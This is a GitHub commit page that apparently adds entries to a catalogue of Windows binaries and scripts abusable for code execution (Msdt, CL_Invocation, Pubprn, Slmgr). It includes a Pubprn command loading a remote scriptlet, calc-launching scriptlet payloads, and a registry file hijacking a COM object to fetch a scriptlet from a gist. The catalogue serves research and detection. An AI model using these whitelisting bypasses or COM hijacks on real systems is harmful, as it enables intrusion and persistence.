Skip to content

Commit 0eb4ec6

Browse files
committed
Added more in new structure
1 parent e4b37b0 commit 0eb4ec6

10 files changed

+202
-0
lines changed

Contribute.md

+29
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,29 @@
1+
Template
2+
3+
## Binary.exe
4+
5+
* Functions: Execute
6+
7+
```
8+
Example
9+
```
10+
11+
Acknowledgements:
12+
* Name of guy - @twitterhandle
13+
14+
Code sample:
15+
* [NameOfLink](Payload/NameOfPayload)
16+
17+
Resources:
18+
* https://linktosomethingusefull.com
19+
20+
Full path:
21+
```
22+
c:\windows\system32\binary.exe
23+
```
24+
25+
Notes:
26+
Some specific details about the binary file.
27+
28+
29+

LOLBins.md

+1
Original file line numberDiff line numberDiff line change
@@ -15,6 +15,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
1515
[Installutil.exe](OSBinaries/Installutil.md)
1616
[Mavinject32.exe](OSBinaries/Mavinject32.md)
1717
[Msbuild.exe](OSBinaries/Msbuild.md)
18+
[Msdt.exe](OSBinaries/Msdt.md)
1819
[Mshta.exe](OSBinaries/Mshta.md)
1920
[Msiexec.exe](OSBinaries/Msiexec.md)
2021
[Odbcconf.exe](OSBinaries/Odbcconf.md)

LOLScripts.md

+1
Original file line numberDiff line numberDiff line change
@@ -5,3 +5,4 @@ If you are missing from the acknowledgement, please let me know (I did not forge
55

66
# OS SCRIPTS
77

8+
[Cl_invocation](OSScripts/Cl_invocation.md)

OSBinaries/Msdt.md

+15
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
## Msdt.exe
2+
3+
* Functions: Execute
4+
5+
```
6+
Open .diagcab package
7+
```
8+
9+
Acknowledgements:
10+
* ?
11+
12+
Resources:
13+
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
14+
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
15+

OSScripts/Cl_invocation.md

+29
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,29 @@
1+
## CL_Invocation.ps1
2+
3+
* Functions: Execute
4+
5+
```
6+
. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
7+
SyncInvoke <executable> [args]
8+
```
9+
10+
Acknowledgements:
11+
* Jimmy - @bohops
12+
13+
Code sample:
14+
15+
16+
Resources:
17+
* https://twitter.com/bohops/status/948548812561436672
18+
19+
Full path:
20+
```
21+
C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
22+
```
23+
24+
Notes:
25+
26+
27+
28+
29+

OSScripts/Pubprn.md

+29
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,29 @@
1+
## Pubprn.vbs
2+
3+
* Functions: Execute
4+
5+
```
6+
pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
7+
```
8+
9+
Acknowledgements:
10+
* Matt Nelson - @enigma0x3
11+
12+
Code sample:
13+
* [Pubprn_calc.sct](Payload/Pubprn_calc.sct)
14+
15+
Resources:
16+
* https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
17+
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
18+
19+
Full path:
20+
```
21+
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
22+
C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
23+
```
24+
25+
Notes:
26+
27+
28+
29+

OSScripts/Slmgr.md

+30
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
## Slmgr.vbs
2+
3+
* Functions: Execute
4+
5+
```
6+
slmgr.vbs
7+
```
8+
9+
Acknowledgements:
10+
* Matt Nelson - @enigma0x3
11+
* Casey Smith - @subtee
12+
13+
Code sample:
14+
* [NameOfLink](Payload/NameOfPayload)
15+
16+
Resources:
17+
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
18+
* https://www.youtube.com/watch?v=3gz1QmiMhss
19+
20+
Full path:
21+
```
22+
c:\windows\system32\slmgr.vbs
23+
c:\windows\sysWOW64\slmgr.vbs
24+
```
25+
26+
Notes:
27+
Requires registry keys to work.
28+
29+
30+

Payload/Pubprn_calc.sct

+22
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
<?XML version="1.0"?>
2+
<scriptlet>
3+
4+
<registration
5+
description="Bandit"
6+
progid="Bandit"
7+
version="1.00"
8+
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
9+
remotable="true"
10+
>
11+
</registration>
12+
13+
<script language="JScript">
14+
<![CDATA[
15+
16+
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
17+
18+
19+
]]>
20+
</script>
21+
22+
</scriptlet>

Payload/Slmgr.reg

+24
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,24 @@
1+
Windows Registry Editor Version 5.00
2+
3+
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
4+
@=""
5+
6+
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
7+
@="{00000001-0000-0000-0000-0000FEEDACDC}"
8+
9+
10+
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
11+
@="Scripting.Dictionary"
12+
13+
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
14+
@="C:\\WINDOWS\\system32\\scrobj.dll"
15+
"ThreadingModel"="Apartment"
16+
17+
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
18+
@="Scripting.Dictionary"
19+
20+
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
21+
@="https://gist.githubusercontent.com/enigma0x3/4373e9a63aaebe177c747af9bc6da743/raw/2207d8a1a536371aff5f61c8bef8400622868976/wee.png"
22+
23+
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
24+
@="Scripting.Dictionary"

Payload/Slmgr_calc.sct

+22
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
<?XML version="1.0"?>
2+
<scriptlet>
3+
4+
<registration
5+
description="Scripting.Dictionary"
6+
progid="Scripting.Dictionary"
7+
version="1"
8+
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
9+
remotable="true"
10+
>
11+
</registration>
12+
13+
<script language="JScript">
14+
<![CDATA[
15+
16+
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
17+
18+
19+
]]>
20+
</script>
21+
22+
</scriptlet>

0 commit comments

Comments
 (0)